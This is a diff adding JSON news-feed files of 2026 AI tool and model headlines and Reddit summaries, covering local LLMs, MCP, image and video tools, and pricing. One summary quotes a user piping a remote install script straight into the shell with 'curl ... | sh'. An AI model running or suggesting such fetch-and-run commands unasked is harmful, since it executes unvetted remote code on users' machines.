Train your own LTX characters.", + "url": "https://reddit.com/r/StableDiffusion/comments/1tkh9c2/phosphene_30_open_source_ai_video_image_suite_for/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-22T12:17:25.000Z", + "summary": "Sharing Phosphene 3.0. It's a free panel that runs LTX-Video 2.3 and a couple of image models natively on Apple Silicon. Local, MIT license, no subs, no cloud. The thing that sets it apart from \"yet another LTX wrapper\": you can \\*\\***train your own characters**\\*\\* inside the panel. Drop 30 to 80 photos, click Train, get a face LoRA back. Add a voice clip and you get a voice LoRA too. Auto-captions with Gemma 3 12B locally. \\~3 hours per character on an M4 Max 64 GB. \\*\\***What 3.0 ships**\\*\\* \\- Text → video+audio (LTX-2 generates joint audio+video in one pass) \\- Image → video+audio \\- Audio → video (drive a clip with an audio reference) \\- FFLF (first frame + last frame interpolation) \\- Extend (continue an existing clip) \\- Character training (face + optional voice LoRA, from a single dataset) \\- Image Studio with three engines: Qwen-Image-Edit-2511, HiDream-O1, and the FLUX.1 family. Multi-reference composition up to 3 subjects. \\*\\***HiDream-O1 ported to MLX**\\*\\* HiDream released their O1 image model on May 14. Got it running natively on Apple Silicon five days later. Photoreal portraits, instruction edits, multi-subject. \\~67 seconds per 1024² on a 64 GB Mac. 
\\*\\***Hardwa…", + "category": "creative_tools" + }, + { + "title": "Sam Altman makes 'mic drop' offer to every Y Combinator startup", + "url": "https://reddit.com/r/ChatGPT/comments/1tkffxq/sam_altman_makes_mic_drop_offer_to_every_y/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-22T10:53:26.000Z", + "summary": "just read this on techcrunch. OpenAI is putting $2M worth of API tokens into every company in the current YC batch (\\~169 startups) via an uncapped SAFE that converts at their next priced round. roughly 2% equity if they hit a $100M valuation. YC takes 7% for $500k cash. this is on top of that, so founders aren't choosing between them. but the dynamic is wild. on one hand, infra bills are the #1 silent killer of AI startups right now. solving that with tokens instead of cash is genuinely useful. on the other hand, Jason Calacanis already came out swinging, basically saying OpenAI now has a window into 169 startups' exact usage patterns, prompts, and product directions. nothing stopping them from rolling the best ideas into ChatGPT itself a year later. we've already seen this movie with the GPT store. also there's the lock in. once your stack is OpenAI native and you've burned the tokens, switching to anthropic or open source models becomes way harder. you're basically buying into the ecosystem with your equity, not just your code. curious what people here think. would you take the deal if you were in YC right now? feels like one of those things that looks like free money but costs…", + "category": "ai_tools" + }, + { + "title": "Which MCP servers are actually changing your Claude workflow? 
Sharing mine", + "url": "https://reddit.com/r/ClaudeAI/comments/1tkec4e/which_mcp_servers_are_actually_changing_your/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-22T09:57:17.000Z", + "summary": "Running Claude with MCP for a couple months now, it really does feel like a whole new product. The ability to run real tools (file system, API, database, etc.) connected to Claude, and never have to cut/paste from context again, is huge. I'm trying a bunch of servers, some are pretty good and some aren't. My current normal is: filesystem server for docs on my computer; GitHub server for PR context; and a handful of other domain specific ones I found. The one thing I keep thinking about is how much better Claude's output gets when you give it the proper context. It seems like less hallucinating, more on point answers. MCP is essentially an answer to \"How do I provide Claude with enough information to help me without having to always watch the context box?\" What are people running? Specifically looking for underrated or domain specific things that don't come up as often.", + "category": "ai_tools" + }, + { + "title": "Gmail tie-ins", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tk5of4/gmail_tieins/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-22T02:29:08.000Z", + "summary": "hey folks. I’m looking to setup a way to give a local LLM access to google cloud SDK for Gmail functions. The goal is to be able to have an LLM once daily check a spreadsheet, and based on criteria send an email that will be structured exactly the same way each time, simply as a notification to the client. I have set up GWS through Hermes agent using Gwen3.5 and gone through the whole Oauth 2.0 method. 
That’s as far as I got tonight before shutting everything down. It gave me some error message in the setup after auth confirmation that I’ll circle back to tomorrow. I’m fairly new to all this obviously. I believe I will need: an excel file that the LLM with access, a .md file listing customer names and emails, and a skill .md file explaining what the email format is and how to decide who to send the email(s) to based on the excel file. I’ve never made a skill before but I’ll do more research on that tomorrow. Am I on the right track here or way off base? Thanks for any input or assistance here.", + "category": "ai_models" + }, + { + "title": "Gergely Neu, an ML researcher at ICREA and Universitat Pompeu Fabra, introduces Value-Driven Transport, a generative modeling framework that integrates optimal control, reinforcement learning, optimal transport, and stochastic primal-dual optimization — Framework evolves samples across five stages via learned value functions.", + "url": "https://www.digg.com/ai/hpkmhl2b?rank=7", + "source": "Digg AI", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 0.94, + "date": "2026-05-22T18:00:11.719Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "I built a music notation app with Claude, and Claude is also a feature inside it", + "url": "https://reddit.com/r/ClaudeAI/comments/1tkp3p4/i_built_a_music_notation_app_with_claude_and/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.78, + "date": "2026-05-22T17:05:02.000Z", + "summary": "I've been building Nubium, an open-source music notation editor, with Claude Code. Check out the [README](https://github.com/nth-chile/nubium) to see how I combined Github issues + Claude skills to find a workflow that worked for me. 
The app is document-driven, which makes it easy for its AI Chat plugin to use the app and edit the score for you. Aside from that, it's a fully-featured editor that's free, runs standalone or in browser, and requires no account. If you happen to be looking for a new notation editor, I'd love any feedback - I made it easy to send feedback in-app. Lmk what you think! Website: [https://nubium.rocks/](https://nubium.rocks/) Repo: [github.com/nth-chile/nubium](http://github.com/nth-chile/nubium)", + "category": "ai_tools" + }, + { + "title": "DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff. — The 1.6-trillion-parameter model offers 1M-token context and fixed per-million pricing.", + "url": "https://www.digg.com/ai/axzmul0l?rank=1", + "source": "Digg AI", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-22T18:00:11.698Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff.", + "url": "https://www.digg.com/ai/axzmul0l", + "source": "Digg AI", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-22T18:00:11.686Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). 
It's a read-only inventory of eve…", + "url": "https://x.com/AlphaSignalAI/status/2057875938180755757", + "source": "X search / AI model updates", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-22T17:27:11.000Z", + "summary": "Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of every installed package, extension, and dev", + "category": "ai_models" + }, + { + "title": "Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claud…", + "url": "https://x.com/svg_icons/status/2057874901252370492", + "source": "X search / Agent workflows", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-05-22T17:23:04.000Z", + "summary": "Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claude-custom-connector … #Claude #MCP #AI #WebDev", + "category": "ai_agents" + }, + { + "title": "I built \"zero2claude\", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. 
No shortcuts, no assum…", + "url": "https://x.com/IShmool/status/2057872918348976191", + "source": "X search / AI model updates", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-22T17:15:11.000Z", + "summary": "I built \"zero2claude\", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assumptions. 17,000+ students. 7", + "category": "ai_models" + }, + { + "title": "trained a prompt injection detector using ml-intern and DeepSeek v4 Flash, runs in the browser", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tkoeuo/trained_a_prompt_injection_detector_using/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-05-22T16:41:10.000Z", + "summary": "Trained a prompt injection classifier using `ml-intern` \\+ DeepSeek v4 Flash. DistilBERT, F1 99%, ONNX int8, \\~65 MB, runs in browser with Transformers.js v3. You can try it here: [https://huggingface.co/spaces/av-codes/prompt-injection-detector](https://huggingface.co/spaces/av-codes/prompt-injection-detector) \\--- I've been interested in prompt injections and agentic security for a while, and wanted to see how a purpose-built ML agent compares to general-purpose coding agents for this kind of task. Here's roughly how it went: `ml-intern` takes an HF token and supports OpenAI-compatible APIs, so I pointed it at OpenRouter (GPU-poor). The agent found existing datasets, [deepset/prompt-injections](https://huggingface.co/datasets/deepset/prompt-injections) and [Shomi28/prompt-injection-dataset](https://huggingface.co/datasets/Shomi28/prompt-injection-dataset), which simplified things since building the dataset is typically 95% of the work in tasks like this. For v1, I went with DistilBERT targeting CPU inference. 
After a few parameter sweeps, the agent launched a full run and landed at F1 95.87%. I also tried training an HRM-Text model, but the agent didn't figure it out and set up…", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-23.json b/data/news-feed-2026-05-23.json new file mode 100644 index 0000000..e779057 --- /dev/null +++ b/data/news-feed-2026-05-23.json @@ -0,0 +1,251 @@ +{ + "generated": "2026-06-05T00:44:42.807Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-23", + "article_count": 15, + "archived_story_count": 332, + "articles": [ + { + "title": "Open-source devtool for AI agent projects [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tle50x/opensource_devtool_for_ai_agent_projects_p/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "open_source", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-23T11:40:19.000Z", + "summary": "Hi everyone, We are building **AgentLantern**, an open-source devtool for AI agent projects. The idea is simple: as agent-based projects grow, it becomes harder to understand how agents, tasks, tools, and configuration files are connected. **AgentLantern** aims to make these projects easier to document, analyze, validate, and visualize. I started with CrewAI support, but the goal is to progressively extend **AgentLantern** to other agent frameworks. **AgentLantern** currently provides three main features: * **Lantern Docs**: generates browsable documentation from source code and configuration files, without LLM calls or API keys. * **Lantern Lint**: statically checks agent projects to detect design or configuration issues before runtime. * **Lantern Play**: runs the project and opens a pixel-art runtime viewer to observe agents working, delegating, calling tools, and producing outputs. 
The project is still early, and I’m mainly looking for feedback from people building with AI agents, multi-agent systems, or devtools. here is a demo video showing the execution of a multi-agent system: [3\\_mins\\_Video](https://www.youtube.com/watch?v=Rklr86AiKuk) Docs: [https://brellsanwouo.github.…", + "category": "ai_research" + }, + { + "title": "Apex-Testing: real-world, real repos, agentic coding benchmark (Update)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tlh4vq/apextesting_realworld_real_repos_agentic_coding/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-23T13:54:08.000Z", + "summary": "**BIG Apex-Testing update!** [https://www.apex-testing.org/](https://www.apex-testing.org/) **The Real-World Agentic Coding** benchmark has been (95%) updated with all recent models! This is based on 65-70 **actual private github repos** made especially to test proper agentic coding capabilities of models. **For those who don't know about the project and see it for the first time, here's the excerpt from the website:** \"**What is APEX Testing?** Every week there's a new model that's \"the best ever.\" Every provider promises 10x performance at a fraction of the cost. Benchmarks get cherry-picked, their demos get curated, influencers get paid and people keep falling for it. APEX exists because I got tired of the hype and the intentional benchmaxxing. Models get dropped into real codebases with real bugs and real feature requests, and they have to figure it out like a developer would. 70 tasks across 8 categories, all based on work you'd actually encounter on the job. 
You get to see what actually works and what's just marketing.\" **What's included currently in metrics:** \\- Avg Cost \\- Avg Time \\- Scoring based off each category/difficulty \\- ELO-based Leaderboard (see details on the…", + "category": "ai_models" + }, + { + "title": "LLaMa.cpp basic question", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tlat5r/llamacpp_basic_question/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-23T08:35:22.000Z", + "summary": "I'm trying to install LLaMa with PI agent. I ran curl -fsSL https://pi.dev/install.sh | sh export PATH=\"/home/user/.local/share/pi-node/node-v22.22.3-linux-x64/bin:$PATH pi install npm:pi-llama.cpp ​ These commands installed pi, added them to path and then I lastly installed an extension that supposedly allows PI agent to connect to my llama models (was that safe or is there a safer way of doing it?). Lastly I ran `yay llama.cpp-vulkan` to install llama.cpp-vulkan.​ Unlike Ollama where I can just get models super easily I have no clue how to get them here. I googled it and asked ChatGPT but I still am so confused. Am I missing something? How do I do it?", + "category": "ai_models" + }, + { + "title": "meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tl4wpi/meituanlongcatlongcatvideoavatar15_hugging_face/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-23T03:27:39.000Z", + "summary": "# 🚀 Model Introduction We are excited to announce the release of LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. 
Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. * 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactions and object handling. * 🌟 **Efficient 8-Step Inference**: Advanced DMD2-…", + "category": "ai_models" + }, + { + "title": "IMG Dataset Refiner v4.3 Pro is here! 🚀 The ultimate dataset prep tool for LoRAs", + "url": "https://reddit.com/r/StableDiffusion/comments/1tl36zc/img_dataset_refiner_v43_pro_is_here_the_ultimate/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-23T02:09:01.000Z", + "summary": "Hey everyone! A while back I shared v3 of my dataset tool. It was a great visual manager and balancer, but as I said back then: it didn't have auto-captioning. Well, that has completely changed! Welcome to v4.3 Pro. The project has taken a massive leap forward and is now a complete, professional *Data Engineering* suite for your AI model training (Flux, SD3, SDXL, etc.). **What's new?** 🤖 **Full AI Integration:** Local AI (LM Studio/Ollama) & Cloud APIs (Claude, Gemini, OpenAI) to auto-caption, translate, and even hunt down visual hallucinations. 
🪄 **Smart AI Recipe Generation:** It automatically analyzes your entire dataset and generates the perfect keyword \"recipe\" (pinning your Trigger Word to the top) for Civitai! 📚 **Mass Batch Editor:** Add, remove, or replace specific tags across a huge selection of images in a single click. 🧹 **Built-in Pre-processing:** Visual duplicate finder, Smart Face Cropping, and mass high-quality resizing. ⚡ **Lightning Fast UI:** Native drag-and-drop for Windows folders, side toggles for a bigger workspace, and real-time translation. It's still the \"recipe book for your LoRAs\", and it's still 100% Open-Source! I've even added 1-click Windo…", + "category": "creative_tools" + }, + { + "title": "got tired of claude code forgetting everything every session, built VIR for it", + "url": "https://reddit.com/r/ClaudeAI/comments/1tlcai2/got_tired_of_claude_code_forgetting_everything/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-23T10:00:52.000Z", + "summary": "Every session i'm debugging something, figuring out a pattern, making some decision with claude that took us 30 minutes to think through. Then i close the terminal and it's just gone. Next day i'm asking the same questions about the same codebase. I was already tracking stuff manually. CLAUDE.md per project, lessons.md, handoff.md, tasks/ folders. But i'd only write down maybe 5% of what was actually useful. The real reasoning was always still buried in the transcripts. Looked in \\~/.claude/projects one day. 226 jsonl files sitting there. Months of work, none of it being used. So i built vir. It reads your sessions in the background, classifies them (pattern / gotcha / decision / tool), distills the useful stuff into an obsidian vault. Then exposes the vault as an mcp server so claude can query it mid-session, basically giving claude code memory across sessions. 
You can also query it yourself if you're curious what's in there: \\`\\`\\` vir query \"what gotchas have i hit with auth\" \\`\\`\\` There's stuff in those transcripts you'll never reread manually. Vir surfaces it. Ran it on my own 226 sessions: 126 notes out, 0.91 avg confidence, across 8 projects. Local-first, runs on mac/linux…", + "category": "ai_tools" + }, + { + "title": "Four calls became one: letting the agent author tools mid-session", + "url": "https://reddit.com/r/ClaudeAI/comments/1tl91km/four_calls_became_one_letting_the_agent_author/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-05-23T06:57:08.000Z", + "summary": "MCP in practice is a connector marketplace, not a runtime. You pick servers up front, the agent inherits a fixed catalog, and turn 1 looks the same as turn 200. The session conforms to the toolset. That ordering is backwards. Most non-trivial work surfaces a tool-shaped gap halfway through. The general catalog gets there in five calls. A bespoke wrapper gets there in one and survives into the next session. The question is whether the agent can close that gap without leaving the conversation. Yesterday I was chasing a flaky recipe. Four calls, every time: query traces, grep for the name, sort by timestamp, diff the two most recent failures. The agent noticed on the third repetition and wrote `findFlakyRecipeRuns(name)` into a watched plugin directory — a wrapper around the existing tools that returns the diff directly. Next turn, one call. By the end of the session there were four of these. I wouldn't have specified any of them in advance; all of them match the shape of the work. The literature calls this a self-modifying execution environment. It's been a footnote because five things have to be true together: 1. The agent writes a tool definition. 2. 
The runtime registers it witho…", + "category": "ai_tools" + }, + { + "title": "Jack Clark announces fictional story with optimistic outlook on humanity's future amid powerful AI systems for next Import AI newsletter — Issue publishes Tuesday; reply questions thematic shift.", + "url": "https://www.digg.com/ai/esmbs3o1?rank=8", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-23T18:00:21.861Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "SemiAnalysis posted data from 174,264 agentic coding sessions showing 42% of runtime on CPU tasks versus 58% on GPU inference and highlighted cloud pricing mismatches with per-token monetization — Median per-turn time measured 5.13 seconds.", + "url": "https://www.digg.com/ai/h7rp9igv?rank=6", + "source": "Digg AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-23T18:00:21.855Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "What features do you wish ComfyUI or A1111 had?", + "url": "https://reddit.com/r/StableDiffusion/comments/1tllp2t/what_features_do_you_wish_comfyui_or_a1111_had/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-23T16:52:11.000Z", + "summary": "TL;DR: I’m building a local orchestration layer on top of ComfyUI, A1111, and Easy Diffusion that manages workflows, prompt generation, tagging, scoring, and generation history to figure out which models/LoRAs/settings actually produce the best results over time. What next features would you find useful? A little while ago I asked people what features they liked most in their local AI image/video UI setups. 
Since then I’ve kept building my own local orchestration app around ComfyUI, Easy Diffusion, and Automatic1111, and it has evolved into more of a full workflow layer than I originally planned. I’ll eventually open source it, so I’d love feedback from people who spend a lot of time with local generation tools. The idea is basically this: Instead of using one UI directly for everything, the app sits on top of multiple local backends and manages the overall generation workflow, history, orchestration, and review process. Right now it supports: * launching/stopping backends from inside the app * choosing which backend to use per run * queued multi-run jobs * image + video generation workflows * selecting saved ComfyUI workflows * centralized gallery/history across all runs * per-im…", + "category": "creative_tools" + }, + { + "title": "GitHub - ForgeFlash: A clean, minimal frontend for Stable Diffusion WebUI Forge — inspired by Fooocus's streamlined workflow but with direct access to the controls that actually matter.", + "url": "https://reddit.com/r/StableDiffusion/comments/1tll04p/github_forgeflash_a_clean_minimal_frontend_for/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-23T16:25:40.000Z", + "summary": "Hi all. My workflow usually includes quick drafting with Fooocus and/or WebUI before committing to batch generation in ComfyUI, and while I enjoy the streamlined approach of Fooocus, the missing hi-res/upscale etc is a drag. And WebUI sometimes feels a bit too busy for when I just want to 'prompt and go'. So I created this very simple new UI which sits between the two philosophically. You need Forge running, but the UI itself is very streamlined HTML/JS/CSS file leveraging Forge in API mode. The Readme covers all the details and modifying the hard coded parts is quite simple. 
Just launch forge with API parameters and open the web page in your browser, it will point to [http://127.0.0.1:7860](http://127.0.0.1:7860) by default and get your installed checkpoints etc. PNG metadata stripping also included. Any comments and feedback welcome, as I do have some ideas for further development, but intend to keep it lightweight and easy to approach.", + "category": "creative_tools" + }, + { + "title": "Benchmarked Needle 26M vs Qwen3-0.6B on CPU function calling, 50 queries across 5 difficulty tiers. The 23x smaller model wins on accuracy and is 4.4x faster.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tljs5o/benchmarked_needle_26m_vs_qwen306b_on_cpu/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-23T15:38:34.000Z", + "summary": "Ran a head-to-head on two open-weight models for tool-calling on a 4-core CPU, no GPU, no cherry-picking. Wanted to see if the small specialist (Needle, 26M, distilled from Gemini 3.1 for function calls) actually holds up against a small generalist (Qwen3-0.6B) that also does tools. Setup: 50 queries across 5 tiers (simple, paraphrased, implicit, ambiguous, edge cases including foreign language and a \"don't call any tool\" trap). 5 mock tools. Three metrics per run: parse\\_success, tool\\_match, args\\_match. Same queries, same eval rubric, same hardware. Headline numbers: Needle (26M) Qwen3 (0.6B) tool_match overall 72.0% 56.0% parse_success 84.0% 54.0% args_match | match 97.2% 100.0% mean latency 10.9s 47.9s The interesting part is not the overall win, it's the failure shapes. They diverge completely: * **Needle** fails by picking the wrong tool. When it does pick a tool, args are right 97% of the time. Its sin is selection, mostly routing system commands to search\\_web instead of run\\_command. * **Qwen3** fails by not calling a tool at all. 
Every single one of its 22 misses is a parse failure where it answered in prose instead of emitting `<tool_call>` tags. When it does emi…", + "category": "ai_models" + }, + { + "title": "GPT 5.5 \"secret sauce\" is just having the thinking be some stupid caveman mode?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tljrtk/gpt_55_secret_sauce_is_just_having_the_thinking/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-23T15:38:11.000Z", + "summary": "I think I had GPT-5.5 leak its trace during a normal conversation, and it really reads like the caveman mode fad from a few months back. Maybe we can achieve better token efficiency by taking some high-quality thinking trace from an open model, \"caveman-izing\" it, and fine-tuning on it. Here is the full log of GPT-5.5 going insane: https://gist.github.com/aussetg/20747ae00df17992acb4ebdfcd8d8d88 EDIT: Ok people I got it the first time", + "category": "ai_models" + }, + { + "title": "My experience using Claude code with Local Llm, and full guide on how to set it up", + "url": "https://reddit.com/r/ClaudeAI/comments/1tlir65/my_experience_using_claude_code_with_local_llm/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-23T14:58:46.000Z", + "summary": "Wanted to share a workflow I tested on a real flight, in case anyone else is trying to set up offline Claude Code. The core idea: using ollama to pull the needed model of what you need, and then use it to run claude code The setup, in order: 1. Pull a model on home wifi the night before. \\`ollama pull <model>\\` — \\~9 GB for a 14B, \\~17 GB for a 26B. Don't try this at the gate. 2. In Claude Code, point at Ollama. The cleanest path I found is wrapping it in two aliases: alias claude-local='ollama launch claude --model gemma4:26b' alias claude-cloud='claude' 3. 
Verify on the ground with wifi physically off. If it works in airplane mode at home, it works at 10 km in the sky. Where I got it wrong: I prepped qwen2.5-coder:14b first because it's the model everyone recommends in local-LLM threads. On the flight, it choked on Claude Code's tool loop; one call took 25 seconds, another took 52. For a workflow that chains five or six tool calls per task, that's unusable. Switched mid-flight to gemma4:26b (which I'd pulled as a backup). Different category of model, RL-trained for tool use, not just code completion. The tool loop ran at a usable speed. The gap analysis I was running on a…", + "category": "ai_tools" + }, + { + "title": "Removing Vision from model", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tlhkts/removing_vision_from_model/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-23T14:11:59.000Z", + "summary": "I removed mmproj file from models to remove vision and save my vram. But just curious, is this really don't affect its text ability? 
I use Qwen 3.6 35b a3b by unsloth and mainly use for agentic coding", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-24.json b/data/news-feed-2026-05-24.json new file mode 100644 index 0000000..7c26aec --- /dev/null +++ b/data/news-feed-2026-05-24.json @@ -0,0 +1,269 @@ +{ + "generated": "2026-06-05T00:44:43.107Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-24", + "article_count": 15, + "archived_story_count": 365, + "articles": [ + { + "title": "I built a local GUI for the TradingAgents framework — works with Ollama", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tm2ct0/i_built_a_local_gui_for_the_tradingagents/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-24T04:51:09.000Z", + "summary": "https://preview.redd.it/i90oxxk7n03h1.png?width=1898&format=png&auto=webp&s=7d219c804fda7dfe122b84fcdb6d0d6883818c68 A while back I came across [TradingAgents](https://github.com/TauricResearch/TradingAgents) — a really cool multi-agent LLM stock analysis framework where like a dozen \"agents\" (market analyst, news analyst, bull researcher, bear researcher, risk team, etc.) debate a stock and produce a final trade recommendation. The output is genuinely interesting to read. Problem: it ships as a CLI. You pick options in a terminal, watch logs scroll, then go hunt for markdown files on disk. The reports are good, the experience of getting to them isn't. So I forked it and bolted on a web GUI. Runs locally, talks to whatever LLM provider you have a key for (OpenAI, Anthropic, Google, OpenRouter, DeepSeek, Ollama, xAI, Qwen, GLM, MiniMax). All Apache 2.0. 
Some things I ended up adding because I wanted them: * Live pipeline visualization showing which agent is working * Reports tab with a 3-pane reader, table-of-contents, search * A \"report length\" knob (Concise / Standard / Comprehensive) — concise mode saves \\~50% tokens * Multi-session chat where you can pin past report…", + "category": "ai_models" + }, + { + "title": "VRAM Suite: early pre-alpha tool for VRAM diagnostics, bounded CUDA probing, and OOM risk estimation", + "url": "https://reddit.com/r/StableDiffusion/comments/1tmixth/vram_suite_early_prealpha_tool_for_vram/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-24T17:45:15.000Z", + "summary": "# I started building VRAM Suite — a small framework for VRAM diagnostics in local AI workflows Hi. I wanted to share a small pre-alpha project I started building: \\*\\*VRAM Suite\\*\\*. The basic idea is simple: local AI workflows often fail with CUDA OOM only after everything has already started. I got tired of guessing how much VRAM is actually usable, so I started writing a small Python framework to inspect, record, and later predict VRAM behavior. It is still early, but the current version already has a working foundation. 
